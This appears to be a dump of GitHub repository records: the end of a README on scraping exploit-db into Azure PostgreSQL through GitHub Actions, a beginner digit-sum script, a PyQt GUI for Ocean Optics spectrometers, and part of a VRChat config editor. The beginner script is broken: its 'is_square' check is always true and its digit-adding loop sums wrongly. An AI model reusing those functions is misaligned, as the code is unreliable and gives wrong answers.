CVEs have the same URL construction.\n\n## Local parsing\nThe first few iterations of parsing an online document will take some effort. Instead of using several requests that get data from a website, download the data _once_ and parse locally. This method has a few positive aspects to it:\n\n- Reduces online requests to 0 for retrying failed attempts\n- Increases speed by an order of magnitude since the HTML is already on disk\n- Easier to debug or test alternative (or modified) HTML parsing\n\n## CI/CD\nOnce local parsing is done and you are satisfied with a few successful passes, then it is time to start thinking about automation. 
Any pipeline or pipeline-like service should work, as long as you are clear about the steps to set the project up. CI/CD jobs like this one need to clearly define their inputs and outputs.\n\nIn this case, the input is the HTML, which has to be processed. But the output for the demo is a remote PostgreSQL database in Azure. This creates a pain point that must be resolved: depending on the platform where the job executes, a plugin or helper will be required to move parsed data into the database.\n\nIf this job ran as an Azure Pipelines job, it would probably be straightforward to connect to the Azure PostgreSQL DB. But this job is running on Github Actions and pushing data to Azure. An Azure Github Action and an Azure PostgreSQL action are required to authenticate and push SQL statements over. Further, firewall changes must happen to allow connectivity between Github and Azure.\n\nAzure PostgreSQL Action: https://github.com/azure/postgresql\n\nGo through the instructions. After creating a PostgreSQL instance, install azure-cli locally and generate the secrets needed for authentication:\n\n```\n   az ad sp create-for-rbac --name {server-name} --role contributor \\\n                            --scopes /subscriptions/{subscription-id}/resourceGroups/{resource-group} \\\n                            --sdk-auth\n\n# Replace {subscription-id}, {resource-group} and {server-name} with the subscription, resource group and name of the Azure PostgreSQL server\n\n# The command should output a JSON object similar to this:\n\n{\n  \"clientId\": \"<GUID>\",\n  \"clientSecret\": \"<GUID>\",\n  \"subscriptionId\": \"<GUID>\",\n  \"tenantId\": \"<GUID>\",\n  (...)\n}\n```\n\nFollow the rest of the instructions on the Action documentation: https://github.com/azure/postgresql#configure-github-secrets-with-azure-credentials-and-postgresql-connection-strings\n\n\n### Generating SQL\nThe Github Action can execute a SQL file and run it against the remote database. For this, the scraper builds a SQL file that is placed in the `sql_files` directory which the workflow file (_main.yml_) picks up later. You can see this in the file itself:\n\n```yaml\n  - uses: azure/postgresql@v1\n    with:\n      connection-string: ${{ secrets.AZURE_POSTGRESQL_CONNECTION_STRING }}\n      server-name: exploit-db.postgres.database.azure.com\n      plsql-file: \"sql_files/*.sql\"\n```\n\n## Alternatives to Github Actions and Azure\nThere is no need to use Github Actions or Azure to make this all work. At the end of the scraping, the data can be pushed over to anywhere, like a CSV file. The scraping can also be done using Jenkins or any other CI/CD platform.\n\nFinally, if you run the scraping code locally and the SQL file gets generated, you can use SQLite to populate the database with the newly generated data.\n" } ]
3
Tahmid-Hossain-287/Adding_digits_of_a_number
https://github.com/Tahmid-Hossain-287/Adding_digits_of_a_number
f66729a57d48f1945e303eeaa843c9ab0df1b196
b3b2041c2303a69c2a4fff3d46a18a2431186ac2
892f7a0181924a5bb37490e4178b98d91255bce3
refs/heads/main
2023-04-26T16:03:06.388235
2021-05-21T15:58:37
2021-05-21T15:58:37
369,584,932
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7628865838050842, "alphanum_fraction": 0.7628865838050842, "avg_line_length": 47.5, "blob_id": "150e3e35f6a1c11f4991ea5df1d22cc2bbaba65c", "content_id": "6ab6e213bcd9fd69ea4a92e6cb8ad4ab00fc17b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 97, "license_type": "no_license", "max_line_length": 68, "num_lines": 2, "path": "/README.md", "repo_name": "Tahmid-Hossain-287/Adding_digits_of_a_number", "src_encoding": "UTF-8", "text": "# Adding_digits_of_a_number\nIt will keep adding the digits of a number until it is of one digit.\n" }, { "alpha_fraction": 0.5112285614013672, "alphanum_fraction": 0.5284016132354736, "avg_line_length": 35.0476188659668, "blob_id": "7bbb73ebb029521cc8786f80bf23836c8b4611bf", "content_id": "26e6c4f89746b020617dc98ea9565ae994cdd9de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 757, "license_type": "no_license", "max_line_length": 166, "num_lines": 21, "path": "/adding_until_one_digit.py", "repo_name": "Tahmid-Hossain-287/Adding_digits_of_a_number", "src_encoding": "UTF-8", "text": "def adding_all_digits_until_one(n):\n if len(str(n)) > 1:\n first = 0\n for _ in str(n):\n _ = int(_)\n second = _\n second = first + _\n first = _\n if len(str(second)) > 1:\n return adding_all_digits_until_one(int(second)) # If the result contains more than one digit, then it is going to get passed into the function again.\n if str(_) == str(n)[-1]:\n return second # If the iterated item is the last digit of the passed number, the loop is going to stop.\n else:\n return n \ndef is_square(n):\n if str(n)[:1] == 0 or 1 or 4 or 5 or 6 or 9:\n return True\n else:\n return False\n\nprint(adding_all_digits_until_one(99))\n" } ]
2
GNHua/Ocean-optics-spectrometer
https://github.com/GNHua/Ocean-optics-spectrometer
56610885df274b748d7ccc3f8a397991aa7c90f4
8a0f74e9057b5f097953ba13474f377fdcf13709
e5ff37c2d0d7b41b6eb870d92f673e7a1bb0ae9e
refs/heads/master
2021-01-11T09:03:30.842802
2017-03-28T02:52:56
2017-03-28T02:52:56
77,368,911
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5923566818237305, "alphanum_fraction": 0.5953291058540344, "avg_line_length": 31.26027488708496, "blob_id": "07c10426e6190e57f5df02560b182290cb640eff", "content_id": "93c7e1491503a565f3375243dbe2a0977f67cf35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2355, "license_type": "no_license", "max_line_length": 77, "num_lines": 73, "path": "/ui/device_table_dialog.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import sys\nfrom seabreeze.spectrometers import list_devices\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass DevTableModel(QtCore.QAbstractTableModel):\n def __init__(self, dev=[]):\n super().__init__()\n self._headers = ['Serial Number', 'Model']\n self._dev = dev\n\n def flags(self, index):\n return QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n\n def rowCount(self, parent): return len(self._dev)\n def columnCount(self, parent): return 2\n\n def data(self, index, role):\n if not index.isValid(): return None\n if role == QtCore.Qt.DisplayRole:\n return self._dev[index.row()][index.column()]\n elif role == QtCore.Qt.TextAlignmentRole:\n return QtCore.Qt.AlignCenter\n else:\n return None\n\n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return self._headers[section]\n else:\n return section+1\n\nUi_Dialog, QDialog = uic.loadUiType('ui/device_table_dialog.ui')\nclass DevTableDialog(QDialog, Ui_Dialog):\n '''\n A dialog window to select device.\n '''\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n\n self.model = DevTableModel()\n self.tableViewDev.setModel(self.model)\n\n self.pushButtonRefresh.clicked.connect(self.refresh)\n self.buttonBox.accepted.connect(self.openDev)\n self.selected_dev = None\n\n self.refresh()\n\n def refresh(self):\n del self.model._dev[:]\n\n for d in list_devices():\n self.model._dev.append([d.serial, d.model])\n\n self.model.layoutChanged.emit()\n\n def openDev(self):\n selected = self.tableViewDev.selectedIndexes()\n if len(selected) > 0:\n # make sure the spectrometer is powered by +5V power supply.\n QtGui.QMessageBox.warning(self, 'Message',\n 'Make sure power supply is connected!',\n QtGui.QMessageBox.Ok)\n # get the serial number of the selected device\n self.selected_dev = self.model._dev[selected[0].row()][0]\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n main = DevTableDialog()\n main.show()\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.5992907881736755, "alphanum_fraction": 0.6141843795776367, "avg_line_length": 26.115385055541992, "blob_id": "871cf93c9b56f50e434db1a93b95934ec9a739a5", "content_id": "925d6a12af9f8c05eccc6313af22e6a1f9573178", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1410, "license_type": "no_license", "max_line_length": 79, "num_lines": 52, "path": "/debug/debug_sb.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import numpy as np\n\nclass Spectrometer:\n @classmethod\n def from_serial_number(cls, serial):\n print(serial + 'opened')\n return cls(serial)\n\n def __init__(self, serial):\n self._has_dark_pixels = True\n self._has_nonlinearity_coeffs = True\n self._serial = serial\n self._model = 'QE65000'\n self._pixels = 1044\n self._minimum_integration_time_micros = 8000\n self._temp = -15\n\n def integration_time_micros(self, t):\n print('set integration time to %d ms' % 
(t/1000))\n\n    def spectrum(self, correct_dark_counts=False, correct_nonlinearity=False):\n        return np.transpose(np.genfromtxt('data/test_data.csv', delimiter=','))\n\n    def tec_set_enable(self, enable):\n        print('Enable TEC: ' + str(enable))\n\n    def tec_get_temperature_C(self):\n        print('Detector temperature %.1f C' % self._temp)\n        return self._temp\n\n    def tec_set_temperature_C(self, t):\n        self._temp = t\n        print('Detector temperature set to %.1f C' % self._temp)\n\n    @property\n    def serial_number(self):\n        return self._serial\n\n    @property\n    def model(self):\n        return self._model\n\n    @property\n    def pixels(self):\n        return self._pixels\n\n    @property\n    def minimum_integration_time_micros(self):\n        return self._minimum_integration_time_micros\n\n    def close(self):\n        print('Spectrometer closed')\n" }, { "alpha_fraction": 0.7003012299537659, "alphanum_fraction": 0.7123494148254395, "avg_line_length": 17.97142791748047, "blob_id": "1a52a03b622ba5f5632eaf5822553f7d3675ddc1", "content_id": "a48965b815147efd62f2e9028abdd9b47db71f2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 664, "license_type": "no_license", "max_line_length": 103, "num_lines": 35, "path": "/README.md", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "# Spectrometer #\n\n## What is this repository for\n\n* Build a simple GUI for Ocean Optics spectrometer\n\n## Hardware & Software\n\n* Ocean Optics spectrometer (Tested on QE65000)\n* Anaconda Python 3.5\n* PyQt4\n\n## How to set up spectrometer\n\n* https://github.com/ap--/python-seabreeze\n\n## Usage\n```\n$ python spectrometer.py -h\n\nusage: python spectrometer.py [-h] [-d]\n\noptional arguments:\n  -h, --help   show this help message and exit\n  -d, --debug  Use dummy module to debug\n```\n\n## To do\n\n* Add absorbance calculation\n* Plot multiple spectra\n\n## Acknowledgements\n\nThanks to [Andreas Poehlmann](https://github.com/ap--) for developing Python support for Ocean Optics instruments.\n" }, { "alpha_fraction": 0.6053511500358582, "alphanum_fraction": 0.6145485043525696, "avg_line_length": 38.900001525878906, "blob_id": "885bcbe0218d24d81cbbc421d06831e807ec98da", "content_id": "35b9e9d6e97f70821279e9843d3fad0d585fb9a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1196, "license_type": "no_license", "max_line_length": 118, "num_lines": 30, "path": "/threads.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "from PyQt4 import QtCore\nimport numpy as np\nimport time, os\n\nclass MultiRunThread(QtCore.QThread):\n    \n    integrationTimeChanged = QtCore.pyqtSignal(float)\n    spectrumAcquiredArr = QtCore.pyqtSignal(np.ndarray)\n    spectrumAcquiredArrStr = QtCore.pyqtSignal(str, np.ndarray)\n    \n    def __init__(self, spec, runs, dark, linear, dir, fn):\n        super().__init__()\n        self.spec = spec\n        self.runs = runs\n        self.dark = dark\n        self.linear = linear\n        self.dir = dir\n        self.fn = fn\n    \n    def run(self):\n        for i, run in enumerate(self.runs):\n            integration_time_ms, interval_s, repeat = run\n            self.spec.integration_time_micros(int(integration_time_ms * 1000))\n            self.integrationTimeChanged.emit(integration_time_ms)\n            for j in range(repeat):\n                s = self.spec.spectrum(correct_dark_counts=self.dark, correct_nonlinearity=self.linear).T\n                fn = os.path.join(self.dir, self.fn+'_{0:.0f}ms_{1:d}_{2:02d}'.format(integration_time_ms, i, j)) # index with j so each repeat gets its own file\n                self.spectrumAcquiredArr.emit(s)\n                self.spectrumAcquiredArrStr.emit(fn, s)\n                
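# pace the run: wait interval_s seconds before the next acquisition\n                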
time.sleep(interval_s)" }, { "alpha_fraction": 0.6075462102890015, "alphanum_fraction": 0.6157597303390503, "avg_line_length": 37.701988220214844, "blob_id": "a43645a623aaf1a736997dae51e196937c71e64f", "content_id": "fbfe289615442b1b5ec46d8139e01c5ca09f90f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11688, "license_type": "no_license", "max_line_length": 109, "num_lines": 302, "path": "/spectrometer.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport time\nimport getpass\nimport argparse\nimport numpy as np\nfrom PyQt4 import QtGui, QtCore, uic\nimport matplotlib\nmatplotlib.use('Qt4Agg')\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\n\nui_module_path = os.path.abspath('./ui')\nif ui_module_path not in sys.path:\n sys.path.insert(1,ui_module_path)\n\nfrom run_table_dialog import RunTableDialog\n\nimport threads\n\nclass MyCanvas:\n def __init__(self):\n self.Fig = Figure()\n self.ax = self.Fig.add_subplot(111)\n self.canvas = FigureCanvas(self.Fig)\n\n def update(self, data):\n self.ax.cla()\n self.ax.set_xlabel('Wavelength (nm)')\n self.ax.set_ylabel('Intensity')\n if isinstance(data, list):\n ymax = max([max(d[:,1]) for d in data])\n for d in data:\n self.ax.plot(d[:,0], d[:,1])\n else:\n ymax = max(data[:,1])\n self.ax.plot(data[:,0], data[:,1])\n if ymax > 70000:\n self.ax.set_ylim(0, 70000)\n else:\n self.ax.set_ylim(0,)\n self.canvas.draw()\n\nUi_MainWindow, QMainWindow = uic.loadUiType('ui/spectrometer.ui')\nclass Window(QMainWindow, Ui_MainWindow):\n def __init__(self):\n super().__init__()\n self.setupUi(self)\n self._is_spec_open = False\n self._runs = []\n self._multirundir = ''\n self._multirunfn = ''\n self.path = os.path.join('/')\n\n self._mrt = threads.MultiRunThread(None, None, False, False, '', '')\n self.addmpl()\n\n self.connectUi()\n\n def connectUi(self):\n self.actionSave.triggered.connect(self.save)\n self.actionPlot.triggered.connect(self.plot_file)\n self.actionQuit.triggered.connect(self.quit)\n self.actionOpenDev.triggered.connect(self.openSpectrometer)\n self.actionSpectrum.triggered.connect(self.getSpectrum)\n self.actionMultiRun.triggered.connect(self.multiRun)\n self.actionSaturationTest.triggered.connect(self.saturationTest)\n self.pushButtonSetInt.clicked.connect(self.setIntegrationTime)\n self._mrt.integrationTimeChanged.connect(self.doubleSpinBoxInt.setValue)\n self._mrt.spectrumAcquiredArr.connect(self.saveBackup)\n self._mrt.spectrumAcquiredArr.connect(self.plot)\n self._mrt.spectrumAcquiredArrStr.connect(self.saveCsv)\n\n def addmpl(self):\n self._canvas = MyCanvas()\n self.mplvl.addWidget(self._canvas.canvas)\n self._toolbar = NavigationToolbar(self._canvas.canvas, self.mplwindow, coordinates=True)\n self.mplvl.addWidget(self._toolbar)\n\n def openSpectrometer(self):\n if not self._is_spec_open:\n devtable = DevTableDialog()\n if devtable.exec_() == QtGui.QDialog.Accepted and devtable.selected_dev:\n try:\n self.spec = sb.Spectrometer.from_serial_number(devtable.selected_dev)\n except:\n QtGui.QMessageBox.critical(self, 'Message',\n \"Can't find spectrometer\",\n QtGui.QMessageBox.Ok)\n self.initSpectrometer()\n else:\n self.closeSpectrometer()\n self.actionSpectrum.setEnabled(self._is_spec_open)\n self.actionOpenDev.setChecked(self._is_spec_open)\n 
self.actionMultiRun.setEnabled(self._is_spec_open)\n        self.actionSaturationTest.setEnabled(self._is_spec_open)\n\n    def initSpectrometer(self):\n        self.initTEC()\n        self.spec.integration_time_micros(self.spec.minimum_integration_time_micros)\n        self.pushButtonSetInt.setEnabled(True)\n        self.doubleSpinBoxInt.setEnabled(True)\n        self.doubleSpinBoxInt.setValue(self.spec.minimum_integration_time_micros/1000)\n        self.doubleSpinBoxInt.setMinimum(self.spec.minimum_integration_time_micros/1000)\n        self.checkBoxDark.setEnabled(self.spec._has_dark_pixels)\n        self.checkBoxDark.setChecked(self.spec._has_dark_pixels)\n        self.checkBoxNonlinear.setEnabled(self.spec._has_nonlinearity_coeffs)\n        self.checkBoxNonlinear.setChecked(self.spec._has_nonlinearity_coeffs)\n        self._is_spec_open = True\n        self._mrt.spec = self.spec\n        self.actionOpenDev.setText('&Close Device')\n        self.actionOpenDev.setToolTip('Close Device')\n\n    def initTEC(self):\n        # initialize thermoelectric cooling\n        self.spec.tec_get_temperature_C()\n        time.sleep(0.1)\n        self.spec.tec_set_enable(False)\n        time.sleep(0.1)\n        self.spec.tec_set_temperature_C(-15)\n        time.sleep(0.1)\n        self.spec.tec_set_enable(True)\n        time.sleep(0.1)\n        while(self.spec.tec_get_temperature_C() > 10):\n            # make sure the spectrometer is powered by +5V power supply.\n            QtGui.QMessageBox.warning(self, 'Message',\n                                      'Connect Power Supply!\\nThen wait for a few seconds.',\n                                      QtGui.QMessageBox.Ok)\n            time.sleep(2)\n            self.initTEC()\n\n    def closeSpectrometer(self):\n        self.spec.close()\n        self.pushButtonSetInt.setEnabled(False)\n        self.doubleSpinBoxInt.setEnabled(False)\n        self.checkBoxDark.setChecked(False)\n        self.checkBoxDark.setEnabled(False)\n        self.checkBoxNonlinear.setChecked(False)\n        self.checkBoxNonlinear.setEnabled(False)\n        self._is_spec_open = False\n        self._mrt.spec = None\n        self.actionOpenDev.setText('&Open Device')\n        self.actionOpenDev.setToolTip('Open Device')\n\n    def setIntegrationTime(self):\n        self.spec.integration_time_micros(int(self.doubleSpinBoxInt.value() * 1000))\n\n    def getSpectrum(self):\n        correct_dark_counts = self.checkBoxDark.isChecked()\n        correct_nonlinearity = self.checkBoxNonlinear.isChecked()\n        if self.actionMultiRun.isChecked():\n            self._mrt.runs = self._runs\n            self._mrt.dark = correct_dark_counts\n            self._mrt.linear = correct_nonlinearity\n            self._mrt.start()\n        else:\n            self.spectrum = self.spec.spectrum(correct_dark_counts, correct_nonlinearity).T\n            self.saveBackup(self.spectrum)\n            self.plot(self.spectrum)\n\n    def plot(self, data):\n        '''Redraw the canvas with the given data'''\n        self._canvas.update(data)\n\n    def saveBackup(self, data):\n        if not os.path.exists('./backup'):\n            os.makedirs('./backup')\n        self.saveCsv(filename=os.path.join('./backup', time.strftime('%Y%m%d_%H%M%S')), data=data)\n\n    def getSpecSetting(self):\n        date = time.strftime(\"%D\")\n        fiber = '100 um fiber' if self.radioButton100um.isChecked() else '1000 um fiber'\n        slit = 'With slit' if self.checkBoxSlit.isChecked() else 'No slit'\n        intTime = 'Integration time: %.1f ms' % self.doubleSpinBoxInt.value()\n        darkCor = 'on' if self.checkBoxDark.isChecked() else 'off'\n        nonlinearCor = 'on' if self.checkBoxNonlinear.isChecked() else 'off'\n        return [date, fiber, slit, intTime, \\\n                'Dark correction '+darkCor, 'Nonlinearity correction '+nonlinearCor]\n\n    def save(self):\n        fn = self.getFileName(0)\n        if fn:\n            fn = os.path.splitext(fn)[0]\n            self.saveCsv(fn)\n            self.savePlot(fn)\n\n    def plot_file(self):\n        fn = self.getFileName(1)\n        if fn:\n            data = np.genfromtxt(fn, delimiter=',')\n            self.plot(data)\n\n    def saveCsv(self, 
filename, data=None):\n if data is None:\n data = self.spectrum\n text = ','.join(self.getSpecSetting())\n np.savetxt(filename+'.csv', data, delimiter=',',\n header=text + '\\nwavelength,intensity')\n\n def savePlot(self, filename):\n fig, ax = plt.subplots(figsize=(12,6))\n ax.plot(self.spectrum[:,0], self.spectrum[:,1])\n ax.set_xlabel('Wavelength (nm)')\n ax.set_ylabel('Intensity')\n ax.text(0.05, 0.9, '\\n'.join(self.getSpecSetting()),\n ha='left', va='top', transform=ax.transAxes)\n plt.savefig(filename+'.png')\n plt.close('all')\n\n def getFileName(self, mode):\n '''\n Get the name and directory\n mode 0 1\n save open\n '''\n title = ['Save data', 'Find']\n acceptmode = [QtGui.QFileDialog.AcceptSave, QtGui.QFileDialog.AcceptOpen]\n\n fd = QtGui.QFileDialog()\n fd.setWindowTitle(title[mode])\n fd.setDirectory(self.path)\n fd.setAcceptMode(acceptmode[mode])\n fd.setDefaultSuffix(\"csv\")\n fd.setNameFilter(\"csv (*.csv)\")\n\n if fd.exec_() == QtGui.QFileDialog.Accepted:\n filename = str(fd.selectedFiles()[0])\n self.path = os.path.dirname(filename)\n return filename\n else:\n return\n\n def multiRun(self):\n # list(self._runs): copy self._runs instead of referring to it.\n dialog = RunTableDialog(runs=list(self._runs))\n dialog.lineEditDir.setText(self._multirundir)\n dialog.lineEditFn.setText(self._multirunfn)\n if dialog.exec_() == QtGui.QDialog.Accepted:\n self._runs = list(dialog.model._runs)\n self._multirundir = dialog.lineEditDir.text()\n self._multirunfn = os.path.splitext(dialog.lineEditFn.text())[0]\n self._mrt.dir = self._multirundir\n self._mrt.fn = self._multirunfn\n multirunready = (len(self._runs) > 0) and bool(self._multirundir) and bool(self._multirunfn)\n self.actionMultiRun.setChecked(multirunready)\n self.pushButtonSetInt.setEnabled(not multirunready)\n self.doubleSpinBoxInt.setEnabled(not multirunready)\n\n def saturationTest(self):\n longExp = self.doubleSpinBoxInt.value()\n shortExp = longExp / 4\n self.spec.integration_time_micros(int(shortExp * 1000))\n shortSpec = np.transpose(self.spec.spectrum(correct_dark_counts=self.checkBoxDark.isChecked(), \\\n correct_nonlinearity=self.checkBoxNonlinear.isChecked()))\n shortSpec[:,1] *= 4\n time.sleep(0.1)\n self.spec.integration_time_micros(int(longExp * 1000))\n longSpec = np.transpose(self.spec.spectrum(correct_dark_counts=self.checkBoxDark.isChecked(), \\\n correct_nonlinearity=self.checkBoxNonlinear.isChecked()))\n self.plot([shortSpec, longSpec])\n\n def quit(self):\n if self._is_spec_open:\n self.spec.close()\n sys.exit()\n\n def closeEvent(self, event):\n self.quit()\n event.accept()\n\n\ndef main(args):\n parser = argparse.ArgumentParser(prog='python spectrometer.py')\n parser.add_argument('-d', '--debug', action='store_true', default=False,\n help='Use dummy module to debug')\n args = parser.parse_args(args)\n if args.debug:\n debug_module_path = os.path.abspath('./debug')\n if debug_module_path not in sys.path:\n sys.path.insert(1,debug_module_path)\n\n import debug_sb as sb\n from debug_device_table_dialog import DevTableDialog\n else:\n import seabreeze.spectrometers as sb\n from device_table_dialog import DevTableDialog\n\n # make imported module global\n globals()['sb'] = sb\n globals()['DevTableDialog'] = DevTableDialog\n\n app = QtGui.QApplication(sys.argv)\n main = Window()\n main.show()\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n" }, { "alpha_fraction": 0.6167935729026794, "alphanum_fraction": 0.6225560903549194, "avg_line_length": 35.81060791015625, "blob_id": 
"49d56b3d15a3884a87c1ccba156a7c489d2d3a4f", "content_id": "7ca7764ba0502b1b2b86df8107a76f06d751c798", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4859, "license_type": "no_license", "max_line_length": 94, "num_lines": 132, "path": "/ui/run_table_dialog.py", "repo_name": "GNHua/Ocean-optics-spectrometer", "src_encoding": "UTF-8", "text": "import sys\nfrom PyQt4 import QtCore, QtGui, uic\n\nclass RunTableModel(QtCore.QAbstractTableModel):\n def __init__(self, runs=[]):\n \"\"\"\n `runs` are a list of run settings, format [[8,1,1],[9,2,2]].\n \"\"\"\n super().__init__()\n self._headers = ['Integration (ms)', 'Interval (s)', 'Repeat']\n self._runs = runs\n \n def flags(self, index):\n return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsEnabled | QtCore.Qt.ItemIsSelectable\n \n def rowCount(self, parent): return len(self._runs)\n def columnCount(self, parent): return 3\n \n def data(self, index, role):\n if not index.isValid(): return None\n if role == QtCore.Qt.DisplayRole:\n return self._runs[index.row()][index.column()]\n elif role == QtCore.Qt.TextAlignmentRole:\n return QtCore.Qt.AlignCenter\n else:\n return None\n \n def setData(self, index, value, role=QtCore.Qt.EditRole):\n self._runs[index.row()][index.column()] = value\n self.dataChanged.emit(index, index)\n return True\n \n def headerData(self, section, orientation, role):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return self._headers[section]\n else:\n return section+1\n\nclass SpinBoxDelegate(QtGui.QItemDelegate):\n def __init__(self):\n super().__init__()\n \n def setEditorData(self, editor, index):\n editor.setValue(index.model()._runs[index.row()][index.column()])\n \n def setModelData(self, editor, model, index):\n model.setData(index, editor.value())\n \n def currentValueChanged(self):\n self.commitData.emit(self.sender())\n \nclass IntegrationDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QDoubleSpinBox(parent)\n spinbox.setRange(8, 10000)\n spinbox.setDecimals(1)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n \nclass IntervalDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QDoubleSpinBox(parent)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n \nclass RepeatDelegate(SpinBoxDelegate):\n def __init__(self): super().__init__()\n def createEditor(self, parent, option, index):\n spinbox = QtGui.QSpinBox(parent)\n spinbox.valueChanged.connect(self.currentValueChanged)\n return spinbox\n\nUi_Dialog, QDialog = uic.loadUiType('ui/run_table_dialog.ui')\nclass RunTableDialog(QDialog, Ui_Dialog):\n def __init__(self, runs=[]):\n super().__init__()\n self.setupUi(self)\n\n self.model = RunTableModel(runs=runs)\n self.tableViewRun.setModel(self.model)\n \n self._delegates = [IntegrationDelegate(), IntervalDelegate(), RepeatDelegate()]\n self.tableViewRun.setItemDelegateForColumn(0, self._delegates[0])\n self.tableViewRun.setItemDelegateForColumn(1, self._delegates[1])\n self.tableViewRun.setItemDelegateForColumn(2, self._delegates[2])\n self.tableViewRun.selectionModel().selectionChanged.connect(self.enableInsert)\n \n self.pushButtonAdd.clicked.connect(self.add)\n self.pushButtonInsert.clicked.connect(self.insert)\n self.pushButtonRemove.clicked.connect(self.remove)\n 
self.pushButtonRemoveAll.clicked.connect(self.removeAll)\n \n self.toolButtonDir.clicked.connect(self.setDir)\n \n def enableInsert(self):\n enabled = False if len(self.tableViewRun.selectedIndexes()) == 0 else True\n self.pushButtonInsert.setEnabled(enabled)\n self.pushButtonRemove.setEnabled(enabled)\n \n def add(self):\n self.insertAt(len(self.model._runs))\n \n def insert(self):\n row = self.tableViewRun.selectedIndexes()[0].row()\n self.insertAt(row)\n \n def insertAt(self, row):\n self.model._runs.insert(row, [8,1,1])\n self.model.layoutChanged.emit()\n \n def remove(self):\n row = self.tableViewRun.selectedIndexes()[0].row()\n del self.model._runs[row]\n self.model.layoutChanged.emit()\n \n def removeAll(self):\n del self.model._runs[:] # delete content, but keep the list\n self.model.layoutChanged.emit()\n \n def setDir(self):\n dir = QtGui.QFileDialog.getExistingDirectory(None, 'Select a folder:', '/', \\\n QtGui.QFileDialog.ShowDirsOnly)\n self.lineEditDir.setText(dir)\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n main = RunTableDialog()\n main.show()\n sys.exit(app.exec_())\n" } ]
6
dj3520/vrcjson
https://github.com/dj3520/vrcjson
4e1565944305cfe6bf146503ad5f7cc6d8f76b25
04ad7bae206efe874429105e556352ffe7023c6a
d4958777de05ef114ce032e1ac8c1d53f93f4b18
refs/heads/master
2023-06-11T07:29:22.830187
2021-07-05T03:36:01
2021-07-05T03:36:01
382,974,162
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6896023154258728, "alphanum_fraction": 0.7044561505317688, "avg_line_length": 51.9746208190918, "blob_id": "e840076225f533c21559e1d101ccd1b7eb93b4a5", "content_id": "3b965c789f38700d5a2f2a31b2a3c3fa1279ee4b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10435, "license_type": "no_license", "max_line_length": 175, "num_lines": 197, "path": "/vrcjson.py", "repo_name": "dj3520/vrcjson", "src_encoding": "UTF-8", "text": "import tkinter as tk\nimport tkinter.messagebox\n\nfrom tkinter import filedialog\n\nimport os, json\nimport traceback # End user\n\nrootwin = tk.Tk()\nrootwin.title(\"VRCJSON - VRChat config file GUI * by DJ3520\")\n\nfile = os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\\\\config.json\"\n\ndef insure_int(val):\n return val.isdigit() or val == \"\"\n\ncache_directory = tk.StringVar()\n\ndef reset_folder():\n cache_directory.set(\"\")\n\ndef choose_folder():\n folder = filedialog.askdirectory(title=\"Choose new location for VRChat cache.\", initialdir=os.getenv('USERPROFILE') + \"\\\\AppData\\\\LocalLow\\\\VRChat\\\\VRChat\", mustexist=True)\n if not os.path.isdir(folder): folder = \"\"\n cache_directory.set(folder)\n\nverify=(rootwin.register(insure_int))\n\nsave_settings_button = tk.Button(rootwin, text=\"Click this button to save updated settings to file.\")\nsave_settings_button.pack(side=tk.TOP, fill=tk.X)\n\n# Cache settings\ncache = tk.LabelFrame(rootwin, text=\"Cache settings\")\ncache.pack(side=tk.TOP, fill=tk.X)\n\ntk.Button(cache, text=\"Choose cache location\", command=choose_folder).grid(row=0, column=0)\nreset_location = tk.Button(cache, text=\"Reset cache location\", command=reset_folder)\nreset_location.grid(row=0, column=1)\ncache_size = tk.StringVar()\ntk.Label(cache, text=\"Maximum cache size in GB: \").grid(row=1, column=0)\ntk.Entry(cache, textvariable=cache_size, width=6, validate='all', validatecommand=(verify, '%P')).grid(row=1, column=1)\ncache_expiry_time = tk.StringVar()\ntk.Label(cache, text=\"Days before item in cache is deleted: \").grid(row=2, column=0)\ntk.Entry(cache, textvariable=cache_expiry_time, width=6, validate='all', validatecommand=(verify, '%P')).grid(row=2, column=1)\n\ndef update_reset(*args):\n if cache_directory.get() == \"\": reset_location.config(state=tk.DISABLED)\n else: 